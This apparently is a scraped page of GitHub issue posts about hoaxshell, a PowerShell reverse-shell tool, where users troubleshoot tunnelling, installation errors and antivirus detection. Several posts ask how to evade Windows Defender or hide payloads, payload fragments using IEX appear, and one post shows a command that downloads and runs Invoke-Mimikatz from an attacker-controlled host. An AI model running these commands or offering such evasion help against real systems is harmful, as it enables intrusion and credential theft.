t3l3machus / hoaxshell Goto Github PK

I've used -H and -o.
And yet its being detected by Windows Defender (AMSI).
Is there a way to manually obfuscate and get it to work?

Does the second connection gets ignored since there isn't an to choose which connection to interact with.

Is there any chance to add ngrok support to be able to use ngrok instead of port-forwarding?

How to get file in system ??

:)

./hoaxshell.py -s 0.tcp.sa.ngrok.io -p 17272 -o

┬ ┬ ┌─┐ ┌─┐ ─┐ ┬ ┌─┐ ┬ ┬ ┌─┐ ┬   ┬  
├─┤ │ │ ├─┤ ┌┴┬┘ └─┐ ├─┤ ├┤  │   │                                                                                                                                                                                                      
┴ ┴ └─┘ ┴ ┴ ┴ └─ └─┘ ┴ ┴ └─┘ ┴─┘ ┴─┘                                                                                                                                                                                                    
                       by t3l3machus                                                                                                                                                                                                    

[Debug] IP address is not valid.

Any help

OS: Windows 11 Insider Preview
Python version: 3.9.6

Steps to reproduce

py hoaxshell.py -ng -i
hoaxshell> payload
...

When creating a tunnel, t=2022-10-12T21:37:19-0600 lvl=info msg="started tunnel" obj=tunnels name="command_line (http)" addr=http://localhost:8080 url=http://x-x-x-x-x.ngrok.io appears to be a "Valid address"

Then, running the payload on victim's machine, fails because of it (Invalid address)

The problem is, that ngrok's output doesn't have https:// in it,
so, using this regex:

 (url = re.compile(r".*url=(http|https):\/\/(.*)").findall()[0][1])

Doesn't throw an error and runs the reverse shell with the expected behavior

Btw sorry for my typos, i don't speak english natively :p

IEX : At line:1 char:16

• (echo bff3dbcb & cd)

•            ~
  

The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:1 char:256

• ... -ne 'None') {$r=I''E''X $c -ErrorAction Stop -ErrorVariable e;$r=Out- ...

•                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
  • FullyQualifiedErrorId : AmpersandNotAllowed,Microsoft.PowerShell.Commands.InvokeExpressionCommand

Hello,
I've been recently playing around with hoaxshell and trying to make its connection go through localtunnel, instead of running it on a local network. I managed to make it work with Ngok, but this has a limit of 20 connections per minute, which is easily achieved by running a few commands. With localtunnel, no errors arise when running the payload in PowerShell, but no connection is found, nothing happens. This happened both connected to the same local network and two separate ones.

Here are the commands I ran on Linux:
cd hoaxshell/
sudo python3 hoaxshell.py -lt

On windows powershell:
powershell -e JABzAD0AJwBlAGEAcwB [...] fQA=

Am I doing this correctly?

Hi Team,
Could anyone advise why i am receiving the connection back when try with netcat but nothing happening when i start the listener ?

Ngl the "X" character in the logo is looking kindof sus ඞ

Whenever I try to run the command I get an error saying Unable to connect to remote server and Cannot bind argument to parameter 'Command' because it is null

Sentinel Alert: 'A command in PowerShell was executed by a suspicious process. PowerShell is often used by attackers to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace. An attacker might be executing commands in the system.'

Alerts are on behavior according to Defender 365

Is the undetectable claim for signature based detection?

Thank you

you must need to add some more features atleast downloading and uploading to the victims pc.

I am receiving the above error while running any command

hi, I wanna start the reverse shell get this error :

Traceback (most recent call last):
File "hoaxshell.py", line 768, in
main()
File "hoaxshell.py", line 549, in main
chill() if quiet else print_banner()
File "hoaxshell.py", line 165, in print_banner
print(f" {''.join(final)}")
UnicodeEncodeError: 'latin-1' codec can't encode character '\u252c' in position 24: ordinal not in range(256)

its intersting that I run Villain i tha same error :
Traceback (most recent call last):
File "Villain.py", line 928, in
main()
File "Villain.py", line 509, in main
chill() if args.quiet else print_banner()
File "Villain.py", line 93, in print_banner
print(f" {''.join(final)}")
UnicodeEncodeError: 'latin-1' codec can't encode character '\u252c' in position 25: ordinal not in range(256)

how to fix it?

When the script is executed in powershell the windows defender pops up this red flag, even with -o (--obfuscate) option

PS C:\Users\Administrsator>powershell IEX(New-Object Net.WebClient).DownloadString('https://MyIP/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"' - NOT Working. Error below. its either port 443 or 4443 its not working. I downloaded mimikatz ps1 file same folder as hoaxshell.py folder.

Payload is using SSL.

Note: I replaced my ip with "myip" to hide my ip.

Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"
At line:1 char:1

• powershell IEX(New-Object Net.WebClient).DownloadString('http://192.1 ...

•   + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException
  
  

Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:108

• ... ://MyIP:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Comman ...

•                                               ~~~~~~~~~~~~~~~
  

  • CategoryInfo : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
  • FullyQualifiedErrorId : CommandNotFoundException

the package readline not installing on python 3.10

https://pypi.org/project/readline/

The module can be used with both Python 2.x and 3.x but only up to 3.3

Would it be possible to add an option to set a proxy to the reverse shell?

At the moment I have to add -Proxy http://:3128 to the RAW payload.

Is possible to embedded that payload for example in image or a file ?

It is not possible to use a domain instead of a ip address.

89..."parser.add_argument("-s", "--server-ip", action="store", help = "Your hoaxshell server ip address or domain.")"

darkside@darksidepi:~/hoaxshell $ ./hoaxshell.py -s exampledomain.net

┬ ┬ ┌─┐ ┌─┐ ─┐ ┬ ┌─┐ ┬ ┬ ┌─┐ ┬   ┬  
├─┤ │ │ ├─┤ ┌┴┬┘ └─┐ ├─┤ ├┤  │   │  
┴ ┴ └─┘ ┴ ┴ ┴ └─ └─┘ ┴ ┴ └─┘ ┴─┘ ┴─┘
                       by t3l3machus

[Debug] IP address is not valid.

I already have ngrok installed but when I use the command python3 hoaxshell.py - ng it says ngrok is not installed.

Do I need to modify the code in hoaxshell.py to get ngrok to work? If yes please tell me how to do it.

I tried to run the powershell -e * generated by hoaxshell, but it returned this error:

At line:1 char:1
+
$s='*.*.*.*:8080';$i='c55b3450-03c33f0f-4e17c4ce';$p='http://';$v
...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your
antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsError
   RecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

The sole purpose of hoaxshell is been undetectable, is there any way this could be fixed (or now antivirus has got footprint of hoaxshell)!?

pip3 install gnureadline==8.1.2
Looking in indexes: https://mirrors.aliyun.com/pypi/simple/
Collecting gnureadline==8.1.2
  Using cached https://mirrors.aliyun.com/pypi/packages/f2/e8/48c0162a732522c7b4568da35ed07d0db07d725f640676b4c9a8ec874d1a/gnureadline-8.1.2.tar.gz (3.1 MB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... error
  error: subprocess-exited-with-error

  × Getting requirements to build wheel did not run successfully.
  │ exit code: 1
  ╰─> [1 lines of output]
      Error: this module is not meant to work on Windows (try pyreadline instead)
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error

× Getting requirements to build wheel did not run successfully.
│ exit code: 1
╰─> See above for output.

note: This error originates from a subprocess, and is likely not a problem with pip.

ModuleNotFoundError: No module named 'gnureadline'

the "-o" function is not specified, and the "-g" option also does not work.I'll be happy if you fix it.

I used the powershell-obfuscation-bible to use randomize-variable.py to obfuscate the normal http payload but after executing it isn't spawning the shell just hangs
I ran it with powershell -e and it gives error in -encodedcommand base64 error
I tried encoding it in base64 using $c = [system.text.encoding]::utf8.getstring([system.convert]::frombase64strong($c)) but then it gives error in hoaxshell terminal error decoding to utf8

is it possible to make hoaxshell generate the same payload every time so you can use a rubber ducky

Hello, when I run the command sudo python3 hoaxshell.py -ng,
I get the following error:
[Debug] Failed to initiate tunnel. Possible cause: You have a tunnel agent session already running in the bg/fg.

Feath-Linux% ./hoaxshell.py -s test.duckdns.org

┬ ┬ ┌─┐ ┌─┐ ─┐ ┬ ┌─┐ ┬ ┬ ┌─┐ ┬   ┬  
├─┤ │ │ ├─┤ ┌┴┬┘ └─┐ ├─┤ ├┤  │   │  
┴ ┴ └─┘ ┴ ┴ ┴ └─ └─┘ ┴ ┴ └─┘ ┴─┘ ┴─┘
                       by t3l3machus

[Debug] IP address is not valid.

Whenever I try to input the payload it gets detected immediately, any idea on how to fix this? Any help would be helpfull
Thanks!

I haven't even used this yet, but the 'X' in the image of the README looks a lot like the famous Nazi symbol. You might want to redesign that letter

Hi - good job on the FUD on win defender
I'm having an issue where I'm not able to cd to any dir

The same issue occurs when opening calc.exe -

Stack trace shows
hoaxshell > calc.exe----------------------------------------Exception occurred during processing of request from ('100.77.140.74', 50237)Traceback (most recent call last): File "/usr/lib/python3.10/socketserver.py", line 316, in _handle_request_noblock self.process_request(request, client_address) File "/usr/lib/python3.10/socketserver.py", line 347, in process_request self.finish_request(request, client_address) File "/usr/lib/python3.10/socketserver.py", line 360, in finish_request self.RequestHandlerClass(request, client_address, self) File "/usr/lib/python3.10/socketserver.py", line 747, in init self.handle() File "/usr/lib/python3.10/http/server.py", line 425, in handle self.handle_one_request() File "/usr/lib/python3.10/http/server.py", line 413, in handle_one_request method() File "/opt/hoaxshell/hoaxshell.py", line 306, in do_POST to_b_numbers = [ int(n) for n in bin_output ] File "/opt/hoaxshell/hoaxshell.py", line 306, in to_b_numbers = [ int(n) for n in bin_output ]ValueError: invalid literal for int() with base 10: ''
doesn't seem to me it is the syntax either -

When I try to run the payload from my Linux Kali VMWARE machine on my Win11 pc, I get the Invoke-WebRequest cant establish a connection to remote desktop and Invoke-Expression : Cannot bind argument to parameter 'Command' because it is null.

Any ideas how to fix this?

Cannot convert 'System.Byte[]' to the type 'System.String' required by parameter 'Command'

I found out what the problem is, it is the $i variable is changed everytime the python script is ran but is there a way to keep the $i variable from changing?

when running the payload, I get "This script contains malicious content and has been blocked by your antivirus software" bummer

Unable to install requirements.txt cause of gnureadline

`Using cached gnureadline-8.1.2.tar.gz (3.1 MB)
Installing build dependencies ... done
Getting requirements to build wheel ... error
error: subprocess-exited-with-error

× Getting requirements to build wheel did not run successfully.
│ exit code: 1
╰─> [1 lines of output]
Error: this module is not meant to work on Windows (try pyreadline instead)
[end of output]

note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error

× Getting requirements to build wheel did not run successfully.
│ exit code: 1
╰─> See above for output.

note: This error originates from a subprocess, and is likely not a problem with pip.`

edit: solved

Invoke-Expression : Cannot bind argument to parameter 'Command' because it is null. At line:1 char:289 + ... rs @{"X-7f3a-d0cd"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorA ... + ~~ + CategoryInfo : InvalidData: (:) [Invoke-Expression], ParameterBindingValidationException + FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.InvokeExpre ssionCommand

if you never used IE ,You can avoid this attack.

Hello there, i have tested Hoaxshell 3 days ago on my machine and it worked with fully patched windows with Defender active.

Now, when i launch the payload on target, it shows

"This skript contains malicious content and is blocked by your antivirus software"

sadly i have no screens or else, because my pc is in german.